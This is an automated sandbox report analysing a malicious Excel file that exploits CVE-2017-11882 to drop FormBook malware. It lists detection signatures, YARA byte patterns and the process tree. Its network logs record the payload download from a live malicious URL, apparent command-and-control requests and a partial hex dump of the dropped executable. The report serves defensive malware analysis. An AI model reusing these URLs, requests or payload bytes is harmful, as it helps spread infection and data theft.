Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name:Booking Confirmation.xlsx
Analysis ID:323046
MD5:97ee696e60901ec520c93f0e8b29b956
SHA1:89780a503e1b57b7d224feb43c5db4db60ede9ff
SHA256:2f2cf9a7f17157fbf03d37450588c9a1396535874097c29d7b12e512295f85ec
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2448 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2536 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2884 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5DEDC928F9F5E3A4C59490E79BCF0773)
      • RegSvcs.exe (PID: 2344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 3024 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 3004 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x183f9:$sqlite3step: 68 34 1C 7B E1
      • 0x1850c:$sqlite3step: 68 34 1C 7B E1
      • 0x18428:$sqlite3text: 68 38 2A 90 C5
      • 0x1854d:$sqlite3text: 68 38 2A 90 C5
      • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
      00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.RegSvcs.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.RegSvcs.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.RegSvcs.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x175f9:$sqlite3step: 68 34 1C 7B E1
          • 0x1770c:$sqlite3step: 68 34 1C 7B E1
          • 0x17628:$sqlite3text: 68 38 2A 90 C5
          • 0x1774d:$sqlite3text: 68 38 2A 90 C5
          • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
          5.2.RegSvcs.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            5.2.RegSvcs.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2536, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
            Sigma detected: Executables Started in Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
            Sigma detected: Execution in Non-Executable FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
            Sigma detected: Suspicious Program Location Process StartsShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exeAvira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeReversingLabs: Detection: 25%
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 25%
            Multi AV Scanner detection for submitted fileShow sources
            Source: Booking Confirmation.xlsxVirustotal: Detection: 31%Perma Link
            Source: Booking Confirmation.xlsxReversingLabs: Detection: 25%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: 5.2.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi5_2_00417295
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi5_2_004172A5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi7_2_00137295
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi7_2_001372A5
            Source: global trafficDNS query: name: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
            Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49167
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 08:03:38 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 25 Nov 2020 23:15:49 GMTETag: "de000-5b4f69ba08c46"Accept-Ranges: bytesContent-Length: 909312Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9e e5 be 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d4 0d 00 00 0a 00 00 00 00 00 00 1e f3 0d 00 00 20 00 00 00 00 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 f2 0d 00 4b 00 00 00 00 00 0e 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 d3 0d 00 00 20 00 00 00 d4 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 06 00 00 00 00 0e 00 00 08 00 00 00 d6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0e 00 00 02 00 00 00 de 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 6f 0b 00 08 83 02 00 03 00 00 00 31 00 00 06 f8 6a 02 00 d0 04 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 06 00 00 00 01 00 00 11 28 02 00 00 06 2a 00 00 13 30 05 00 13 01 00 00 02 00 00 11 72 01 00 00 70 0a 06 72 09 00 00 70 28 08 00 00 06 28 09 00 00 06 3a c9 00 00 00 20 fa 1b 25 b4 20 e0 3a 01 ac 61 25 0c 1d 5e 45 07 00 00 00 05 00 00 00 a9 00 00 00 4f 00 00 00 d0 ff ff ff 1f 00 00 00 99 00 00 00 7d 00 00 00 38 a4 00 00 00 28 03 00 00 06 0b 07 2d 08 20 aa a8 23 fc 25 2b 06 20 eb 5c c8 de 25 26 2b b6 07 28 0d 00 00 06 28 0e 00 00 06 72 1d 00 00 70 28 0f 00 00 06 2c 08 20 2d 58 ab 08 25 2b 06 20 64 13 ed 55 25 26 08 20 2a ba e0 05 5a 61 2b 86 06 72 29 00 00 70 28 0a 00 00 06 28 0b 00 00 06 2c 08 20 25 c7 bf 5f 25 2b 06 20 c0 c9 bb 2a 25 26 08 20 d9 02 38 4b 5a 61 38 58 ff ff ff 72 4d 00 00 70 28 10 00 00 06 08 20 a6 ef a1 bc 5a 20 58 2c c2 78 61 38 3c ff ff ff 14 28 0c 00 00 06 20 ca 8a 29 b0 38 2c ff ff ff 14 fe 06 07 00 00 06 73 1d 00 00 0a 28 11 00 00 06 25 17 2
            Source: global trafficHTTP traffic detected: GET /kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== HTTP/1.1Host: www.affinitymotorsales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll HTTP/1.1Host: www.setyourhead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 103.125.191.5 103.125.191.5
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
            Source: Joe Sandbox ViewASN Name: WEBAIR-INTERNETUS WEBAIR-INTERNETUS
            Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: workfinewsdysanotherrainbowlomoyentwsnma.ydns.euConnection: Keep-Alive
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1631DAC0.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: workfinewsdysanotherrainbowlomoyentwsnma.ydns.euConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== HTTP/1.1Host: www.affinitymotorsales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll HTTP/1.1Host: www.setyourhead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
            Source: explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
